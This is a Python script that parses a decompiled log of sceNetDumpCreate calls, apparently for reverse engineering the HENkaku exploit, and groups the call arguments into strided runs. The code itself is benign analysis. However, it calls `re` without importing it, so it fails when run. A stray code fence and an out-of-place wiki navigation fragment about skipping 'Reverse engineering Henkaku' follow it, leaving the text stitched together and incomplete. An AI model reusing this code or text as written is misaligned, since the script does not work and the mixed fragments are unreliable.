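from dataclasses import dataclass
from typing import Dict, List

# Constructed excerpt in the same shape as the decompiled call log
# (a handful of calls at the tail of the sweep, not the real full dump).
SAMPLE_LOG = """
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0300, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0200, 0x00000000);
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0100, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x000A0000, 0x00000000);
sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000); sceNetDumpCreate(x_stack + 0x0000EDAC, 0x00001000, 0x00000000);
"""

# Matches one call and captures the three hex operands (stack offset, second arg, third arg).
CALL_RE = re.compile(
    r"sceNetDumpCreate\(\s*x_stack\s*\+\s*0x([0-9A-Fa-f]+)\s*,"
    r"\s*0x([0-9A-Fa-f]+)\s*,\s*0x([0-9A-Fa-f]+)\s*\)"
)


@dataclass
class Run:
    first: int   # second argument of the first call in the run
    last: int    # second argument of the last call in the run
    stride: int  # difference between consecutive calls (0 = value repeated)
    count: int   # number of calls in the run


def parse_calls(text: str) -> List[int]:
    """Return the second argument of every sceNetDumpCreate call, in log order."""
    return [int(m.group(2), 16) for m in CALL_RE.finditer(text)]


def group_runs(values: List[int]) -> List[Run]:
    """Collapse consecutive values with the same difference into Run records."""
    runs: List[Run] = []
    i, n = 0, len(values)
    while i < n:
        stride = values[i + 1] - values[i] if i + 1 < n else 0
        j = i + 1
        while j < n and values[j] - values[j - 1] == stride:
            j += 1
        runs.append(Run(values[i], values[j - 1], stride, j - i))
        i = j
    return runs


def summarize(text: str) -> Dict[str, object]:
    """Parse a log and report call count, total of the second arguments, and runs."""
    values = parse_calls(text)
    return {
        "calls": len(values),
        "sum_second_arg": sum(values),
        "runs": group_runs(values),
    }


def describe(text: str) -> List[str]:
    """Human-readable one line per run, e.g. for pasting into analysis notes."""
    lines = []
    for r in group_runs(parse_calls(text)):
        lines.append(
            f"{r.count} calls: 0x{r.first:08X} -> 0x{r.last:08X}, stride {r.stride:+#x}"
        )
    return lines


if __name__ == "__main__":
    for line in describe(SAMPLE_LOG):
        print(line)
```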

TAP HERE TO SKIP THE WIKI

This is the exception to the "important" notice at the beginning: it is used to jump to the bottom of the wiki and skip "Reverse engineering Henkaku".